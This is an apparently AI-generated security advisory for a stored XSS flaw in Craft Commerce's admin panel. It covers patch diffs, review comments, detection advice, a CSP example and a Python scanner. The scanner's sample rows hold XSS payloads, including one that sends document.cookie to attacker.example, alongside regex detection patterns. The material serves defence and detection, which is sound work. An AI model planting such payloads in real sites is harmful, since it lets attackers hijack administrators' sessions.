CVE-2026-25486 Overview
CVE-2026-25486 is a stored Cross-Site Scripting (XSS) vulnerability in Craft Commerce, the ecommerce plugin for Craft CMS. Values entered in the Store Management section of the control panel, including the Shipping Methods Name field, are rendered back into admin pages without HTML encoding, so an attacker with access to those fields can store JavaScript that executes in the browser of any administrator who later views the affected listing.
Critical Impact
An attacker who already holds high-privileged access can store a persistent script that executes in the session of any other administrator who views the affected page. Because the script runs with that administrator's authenticated session, it can read whatever the page exposes and issue requests on the victim's behalf, leading to session hijacking, privilege abuse, or unauthorized changes within the Craft Commerce control panel.
Affected Products
- Craft Commerce versions 5.0.0 through 5.5.1
- Craft CMS installations utilizing Craft Commerce for ecommerce functionality
- The Store Management section of the control panel (shipping methods, shipping categories, inventory locations)
Discovery Timeline
- 2026-02-03 - CVE-2026-25486 published to NVD
- 2026-02-04 - Last updated in NVD database
Technical Details for CVE-2026-25486
Vulnerability Analysis
This stored XSS vulnerability is caused by insufficient output encoding when admin-supplied strings are rendered in the Craft Commerce control panel. Names entered for shipping methods and shipping categories, and inventory location address lines, were placed into admin listing pages without HTML entity encoding, so input containing markup is stored in the database exactly as entered and is interpreted as HTML, rather than displayed as text, when another administrator views the listing.
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation). The attack requires network access and high privileges (administrator-level access to create or modify shipping methods), along with user interaction from another administrator viewing the malicious content.
Root Cause
The root cause is missing HTML encoding on user-controlled values at the point where they are output in the admin interface. Values such as $inventoryLocation->getAddressLine() and $shippingCategory->name were placed directly into the page data without being passed through an encoding helper such as Html::encode(), so any markup in them reached the browser intact. Output encoding, not input sanitization, is the correct fix here: the stored value may legitimately contain characters such as an ampersand or a quote, and encoding at render time neutralizes them for the HTML context while leaving the stored data unchanged.
The vulnerable code paths were identified in:
- src/controllers/InventoryLocationsController.php - address field output
- src/controllers/ShippingCategoriesController.php - shipping category name output
Attack Vector
An attacker with administrative access to Craft Commerce can enter a JavaScript payload into the Shipping Methods Name field or the related shipping category and inventory location fields. When another administrator opens the Store Management section and views the listing that includes these records, the stored payload is emitted as HTML and the script executes in that administrator's browser context. No interaction beyond loading the page is needed.
The following patch demonstrates how the vulnerability was addressed by adding proper HTML encoding:
'id' => $inventoryLocation->id,
'title' => $inventoryLocation->getUiLabel(),
'handle' => $inventoryLocation->handle,
- 'address' => $inventoryLocation->getAddressLine(),
+ 'address' => Html::encode($inventoryLocation->getAddressLine()),
'url' => $inventoryLocation->getCpEditUrl(),
'delete' => $inventoryLocations->count() > 1 ? $deleteButton : '',
];
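Review bot: only the address column gets Html::encode() here; 'title' => $inventoryLocation->getUiLabel() and 'handle' => $inventoryLocation->handle two lines above are also admin-supplied strings dropped into the same row array. If the table renders those columns through the same raw path that made address exploitable, they need the same call; if the table component encodes title and handle itself, a one-line comment saying which columns are emitted raw would keep the next contributor from adding another unencoded column to this array.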
Source: GitHub Commit
A similar fix was applied to the shipping categories controller:
// Generate table data with chips
$tableData = [];
foreach ($shippingCategories as $shippingCategory) {
- $label = Craft::t('site', $shippingCategory->name);
+ $label = Html::encode(Craft::t('site', $shippingCategory->name));
$tableData[] = [
'id' => $shippingCategory->id,
'title' => $label,
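Review bot: after this change $label holds an HTML-encoded string rather than the raw category name, so any later use of it in a context that encodes again (an attribute helper, a JSON response) will double-encode. Renaming it to something like $labelHtml, or encoding at the point of use ('title' => Html::encode($label)) rather than at assignment, makes that contract visible. The order Html::encode(Craft::t(...)) is right: the translated message, not the source key, is what reaches the page, so it is the translated string that must be encoded.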
Source: GitHub Commit
Detection Methods for CVE-2026-25486
Indicators of Compromise
- Unusual JavaScript code or HTML tags present in shipping method names, shipping category names, or inventory location address fields
- Unexpected network requests originating from admin panel pages to external domains
- Database entries containing script tags or event handlers (e.g., <script>, onerror=, onload=) in commerce-related tables
Detection Strategies
- Implement Web Application Firewall (WAF) rules that flag script tags, event-handler attributes, and javascript: URIs in form submissions to the Craft Commerce control panel; treat this as a detection aid rather than a control, since the submitter is already an authenticated administrator
- Review control panel activity logs for creation or modification of shipping methods, shipping categories, and inventory locations whose values contain markup
- Deploy Content Security Policy (CSP) headers that restrict inline script execution and report violations
Monitoring Recommendations
- Configure CSP violation reporting (report-uri or report-to) so that a script blocked in an administrator's browser still produces a record; browser-side XSS auditors have been removed from current browsers and cannot be relied on
- Monitor the tables behind shipping methods, shipping categories, and inventory locations for values containing tags, event-handler attributes (onerror=, onload=), or javascript: URIs; a bare ampersand or quote in an address is normal and should not by itself raise an alert
- Configure endpoint monitoring (for example SentinelOne) on administrator workstations to alert on browser processes contacting unexpected domains; the injected script runs in the administrator's browser, not in the web server process, so egress monitoring on the web server alone will not observe a successful exploit
How to Mitigate CVE-2026-25486
Immediate Actions Required
- Upgrade Craft Commerce to version 5.5.2 or later immediately
- Review existing shipping methods, shipping categories, and inventory location records for any suspicious entries containing script tags or JavaScript event handlers
- Temporarily restrict admin panel access to trusted IP addresses while patching is in progress
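The record review above and the database monitoring recommended under Detection Methods both come down to the same check: find admin-editable strings that carry markup, without paging anyone for an address that legitimately contains an ampersand. The following Python script is an added example, not code from Craft Commerce or from the advisory; its rows are constructed, and the table and column names in them are assumptions to be replaced with the ones in your own schema. It also shows, in Python terms, what the patch's Html::encode() call does to a stored payload at render time.

```python
"""Scan Craft Commerce admin-editable strings for stored markup (added example).

Not part of Craft Commerce. SAMPLE_ROWS is constructed test data; the table and
column names in it are assumptions, not a verified Commerce schema.
"""
import html
import re

# Indicators that a value meant to be plain text carries markup or script.
# Kept narrow on purpose: a bare '&' or a quote in an address is normal.
INDICATORS = [
    ("html-tag", re.compile(r"<\s*/?\s*[a-zA-Z][\w-]*")),
    ("event-handler", re.compile(r"\bon[a-zA-Z]+\s*=")),
    ("javascript-uri", re.compile(r"javascript\s*:", re.IGNORECASE)),
    ("data-html-uri", re.compile(r"data\s*:\s*text/html", re.IGNORECASE)),
]

# Constructed sample rows standing in for a SELECT over the name/address columns.
# Table and column names are assumptions; check your own schema.
SAMPLE_ROWS = [
    {"table": "commerce_shippingcategories", "id": 1, "field": "name",
     "value": "Standard"},
    {"table": "commerce_shippingcategories", "id": 2, "field": "name",
     "value": "Bulky <img src=x onerror=alert(document.cookie)>"},
    {"table": "commerce_inventorylocations", "id": 1, "field": "addressLine1",
     "value": "1 Main St & Co"},
    {"table": "commerce_inventorylocations", "id": 2, "field": "addressLine1",
     "value": "<svg/onload=fetch('https://attacker.example/?c='+document.cookie)>"},
    {"table": "commerce_shippingmethods", "id": 3, "field": "name",
     "value": 'Express <a href="javascript:alert(1)">tracking</a>'},
]


def find_indicators(value):
    """Return the indicator labels that match value, in INDICATORS order.

    The value is checked as stored and again after one round of entity
    decoding, so a payload that was entity-encoded on the way in (and could
    be decoded by a later consumer) still gets a human look.
    """
    candidates = {value, html.unescape(value)}
    return [label for label, pattern in INDICATORS
            if any(pattern.search(c) for c in candidates)]


def scan_records(rows):
    """Return [(table, id, field, labels)] for every row with at least one hit."""
    flagged = []
    for row in rows:
        hits = find_indicators(row["value"])
        if hits:
            flagged.append((row["table"], row["id"], row["field"], hits))
    return flagged


def encode_for_html(value):
    """Python counterpart of the fix: Yii's Html::encode() is htmlspecialchars()
    with ENT_QUOTES, and html.escape(quote=True) likewise escapes & < > " and '."""
    return html.escape(value, quote=True)


def render_cell(value, encode=True):
    """One listing-table cell, with the fix (encode=True) or as the vulnerable
    code emitted it (encode=False)."""
    return "<td>%s</td>" % (encode_for_html(value) if encode else value)


if __name__ == "__main__":
    for table, row_id, field, hits in scan_records(SAMPLE_ROWS):
        print("%s id=%s %s: %s" % (table, row_id, field, ", ".join(hits)))
    payload = SAMPLE_ROWS[1]["value"]
    print("vulnerable:", render_cell(payload, encode=False))
    print("patched:   ", render_cell(payload))
```

Run it against real data by replacing SAMPLE_ROWS with the rows of a SELECT over the name and address columns. Every flagged row should be looked at by a person before it is edited or deleted: the patterns are deliberately broad enough to catch handlers written without spaces or quotes, and will occasionally catch harmless text such as a name ending in "one=".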
Patch Information
The vulnerability has been patched in Craft Commerce version 5.5.2. The fix applies proper HTML encoding using Html::encode() to user-supplied values before rendering them in the admin panel. Organizations should update to this version or later to remediate the vulnerability.
For detailed patch information, see the GitHub Security Advisory GHSA-g92v-wpv7-6w22 and the version 5.5.2 release.
Workarounds
- Implement a Content Security Policy that disallows inline scripts and restricts script sources to trusted origins; the Craft control panel itself relies on inline scripts, so roll the policy out in report-only mode first and add nonces or hashes for the control panel's own scripts before enforcing it, otherwise the admin UI may stop working
- Sanitize database entries by manually reviewing and cleaning shipping method names and inventory location addresses for malicious content
- Limit administrative access to the Store Management section to only essential personnel until the patch can be applied
# Example CSP header configuration for Apache. The /csp-report path is a placeholder for your own violation collector.
# Test on a staging site first: the Craft control panel emits inline scripts, so start with Content-Security-Policy-Report-Only
# and add nonces or hashes for the control panel's scripts before switching to the enforcing header below.
Header set Content-Security-Policy "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'; frame-ancestors 'self'; report-uri /csp-report"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


